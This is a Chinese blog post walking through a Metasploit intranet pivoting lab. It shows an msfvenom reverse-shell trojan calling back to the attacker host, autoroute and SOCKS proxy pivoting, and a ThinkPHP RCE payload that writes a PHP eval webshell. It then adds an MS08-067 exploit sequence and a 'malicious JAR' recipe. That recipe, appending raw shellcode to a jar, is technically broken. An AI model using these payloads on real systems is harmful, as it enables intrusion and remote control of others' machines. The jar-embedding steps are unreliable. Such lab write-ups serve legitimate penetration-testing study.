MSF内网渗透

环境搭建

windows server 2008 :asp站点 双网卡 192.168.5.24 -10.10.10.8
win7 :内网主机 开放80web服务 使用thinkphp搭建 10.10.10.9
kali:攻击机 192.168.5.51

目标 : 拿下两台主机的权限

复现步骤

  1. (省略搭建站点步骤)给win2008添加一张网卡 保证可以与内网主机win7相互通信 kali访问asp站点

  1. getshell后(省略getshell步骤直接演示内网渗透)反弹到msf进行内网渗透

  1. msf设置好监听 生成反向木马 上传到webshell并运行

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.51 LPORT=8001 -f exe -o /tmp/lssam.exe
  1. 拿到的会话是低权限账户 利用烂土豆进行提权

  1. 查看上线主机内网路由 我们先获取目标内网相关信息,可以看到该主机上的网卡有两个网段

run get_local_subnets
  1. 添加这边模拟的10网段的内网路由

run autoroute -s 10.10.10.0/24 # 添加到达10.10.10.0网段的路由
run autoroute -p # 打印路由信息
  1. 添加好路由了 , 紧接着使用msf扫描一下内网存活的主机(这里略过扫描时间太长...)此时只是把msf整个工具拖到了10内网中 , 但是kali机器上的其他工具是无法访问到10段的 ,我们可以使用socks_proxy解决这个问题。

background
use auxiliary/server/socks_proxy
show options
run
  1. 修改kali的/etc/proxychains4.conf文件

vim /etc/proxychains4.conf
socks5 127.0.0.1 1080
  1. 使用代理打开火狐浏览器 访问win7站点测试

  1. 存在rce nday , 直接使用payload打

  1. 写入一句话 蚁剑链接

http://10.10.10.9/index.php/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[888]);?>" > cm.php

### 关于 Metasploit 框架在内网渗透中的应用 #### 什么是 Metasploit? Metasploit 是一种功能强大的开源渗透测试框架,广泛应用于网络安全评估和漏洞研究领域。该框架提供了丰富的模块化设计,支持多种类型的攻击向量以及后渗透阶段的操作工具[^1]。 #### 内网渗透的主要过程 内网渗透通常遵循标准化的渗透测试流程,具体分为以下几个部分: - **前期交互 (Pre-engagement Interactions)** 此阶段涉及与客户沟通以明确目标范围、时间安排以及其他约束条件等内容[^2]。 - **情报收集 (Intelligence Gathering)** 利用公开资源或技术手段搜集有关目标网络的信息,例如 IP 地址、开放端口和服务版本等数据。 - **威胁建模 (Thread Modelling)** 对所获得的情报进行分析处理,并识别潜在的安全风险点。 - **漏洞分析 (Vulnerability Analysis)** 运用扫描器或其他自动化工具检测系统中存在的弱点,同时验证其真实性。 - **渗透攻击 (Exploitation)** 配置合适的exploit模块针对发现的目标服务发起实际攻击尝试获取控制权^。 - **后渗透攻击 (Post Exploitation)** 成功入侵之后进一步探索内部环境寻找敏感资料或者横向移动至其他主机上继续扩展访问权限^。 - **报告撰写 (Reporting)** 将整个过程中遇到的问题汇总整理成文档形式提交给委托方作为改进依据^。 #### 使用案例:通过 MS08-067 漏洞实现远程代码执行 假设存在一台运行 Windows Server 2003 的服务器未修补 CVE-2008-4250(即著名的 MS08-067),可以按照如下方式利用 Metasploit 来完成对该机器的接管工作: ```bash use exploit/windows/smb/ms08_067_netapi set RHOSTS <target_ip> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <local_ip> set LPORT <listening_port> run ``` 上述命令序列依次完成了指定目标地址、选择有效载荷类型及其参数设置最后启动攻击动作的任务描述[^3]^。 另外,在某些特殊场景下如果目标环境中部署有 Java 应用程序,则还可以考虑采用基于 JVM 层面存在的缺陷来进行突破尝试。比如下面这个例子展示了如何创建一个带有隐藏功能的 JAR 文件用于分发传播恶意软件实例: ```java import java.io.*; public class Evil { public static void main(String[] args){ try{ Runtime.getRuntime().exec("cmd /c start calc.exe"); }catch(Exception e){} } } // Compile and package into a jar file. javac Evil.java && jar cvfe evil.jar Evil.class . ``` 接着再配合 `msfvenom` 工具生成自定义 payload 并嵌入到刚才准备好的载体当中去形成最终成品供后续投放使用[^4]^。 ```bash msfvenom -p generic/shell_reverse_tcp LHOST=<your_IP> LPORT=<port_number> -f raw > shellcode.bin cat shellcode.bin >> evil.jar zip -A evil.jar ``` 以上便是关于如何运用 Metasploit 开展内网渗透活动的一些基础知识和技术要点概述。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值